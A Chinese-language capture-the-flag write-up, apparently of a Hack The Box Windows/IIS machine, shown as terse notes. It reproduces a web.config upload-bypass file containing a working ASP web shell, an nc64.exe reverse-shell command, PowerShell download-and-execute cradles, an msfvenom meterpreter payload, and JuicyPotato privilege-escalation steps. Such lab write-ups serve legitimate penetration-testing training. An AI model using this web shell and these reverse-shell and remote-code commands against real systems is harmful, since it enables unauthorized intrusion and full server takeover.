端口扫描
80/tcp open http
该网站本身只是提供了一个向导的图像merlin.jpg
f12 抓包响应标头表明该站点由以下人员提供支持ASP.NET
:
gobuster -u http://10.10.10.93 -w usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster_root -x aspx爆破目录
/transfer.aspx (Status: 200) /uploadedFiles (Status: 301) /uploadedfiles (Status: 301)
/transfer.aspx
呈现一个带有“浏览...”和“上传”按钮的简单表单:
上传一个图片看看
aspx shell 的副本,并尝试上传它。第一次尝试上传时,页面拒绝它
利用%00绕过
上传成功,但是当我查看 时http://10.10.10.93/UploadedFiles/cmdasp.aspx
,它返回一个错误:
就是上传了却没办法执行
错误提供了修改文件的建议web.config
。该web.config
文件包含 IIS 服务器上 Web 应用程序的设置和配置数据。它类似于.htaccess
Apache 服务器上的。如果我可以通过上传修改它,说不定可以利用
这边也可以bp抓包利用[SecLists]里的raft-small-extensions.txt 单词列表爆破一下支持哪些文件后缀,也可以找到config是接受的
谷歌搜索bypass upload aspx找到
Bypass Upload Restrictions and Evade Detection | Fgsec
<?xml version="1.0" encoding="UTF-8"?><configuration><system.webServer><handlers accessPolicy="Read, Script, Write"><add name="new_policy" path="*.config" verb="GET" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" /></handlers><security><requestFiltering><fileExtensions><remove fileExtension=".config" /></fileExtensions><hiddenSegments><remove segment="web.config" /></hiddenSegments></requestFiltering></security></system.webServer><appSettings></appSettings></configuration>
<!–-
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)
%>
http://10.129.154.126/uploadedfiles/ web.config?cmd=whoami
sudo python /usr/share/doc/python3-impacket/examples/smbserver.py share .
http://10.129.154.126/uploadedfiles/ web.config?cmd=\10.10.14.72\share\nc64.exe -e cmd.exe 10.10.14.72 443
成功反弹shell
尝试多种方法提权
systeminfo
Whoami /priv
SeImpersonatePrivilege存在,可以利用GitHub - decoder-it/lonelypotato: Switch to JuicyPotato! https://github.com/decoder-it/juicy-potato
sherlock
GitHub - rasta-mouse/Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities
iex(new-object net.webclient).downloadstring('http://10.10.14.5/Sherlock.ps1')
Find-AllVulns
Watson
如何编译在上文有
(new-object net.webclient).downloadfile('http://10.10.14.5/Watson.exe', '\users\merlin\appdata\local\temp\watson.exe')
.\watson.exe
Metasploit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=445 -f psh -o www/met-445.ps1
-f psh
输出一个 PowerShell 命令,该命令将启动反向 tcp meterpreter shell。
msf exploit(multi/handler) > options
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.5 yes The listen address (an interface may be specified)
LPORT 445 yes The listen port
run
use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > run
提权
potato
从此处的 GitHub 存储库获取 JuicyPotato.exe 的副本,确保获取可执行文件的 64 位版本。
kali的HTTP 服务器开启
(new-object net.webclient).downloadfile('http://10.10.14.8:8080/JuicyPotato.exe', '\temp\JuicyPotato.exe')pla
需要 COM 服务器的端口号和有效的 CLSID
这个PowerShell 脚本来提取当前系统的 CLSID
https://raw.githubusercontent.com/ohpe/juicy-potato/master/CLSID/GetCLSID.ps1
使用批量脚本下载 Nishang PowerShell 脚本
echo "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.8:8080/Invoke-PowerShellTcp.ps1')" > shell.bat
上传靶机
(New-Object System.Net.WebClient).DownloadFile('http://10.10.14.8:8080/shell.bat', '\temp\shell.bat')
如果默认 CLSID 失败,漏洞发布者已提供用于测试的替代 CLSID 列表,可在此处获取。
kali监听
使用第一个
./JuicyPotato.exe -l 4343 -p C:\temp\shell.bat -t * -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}"
成功反弹shell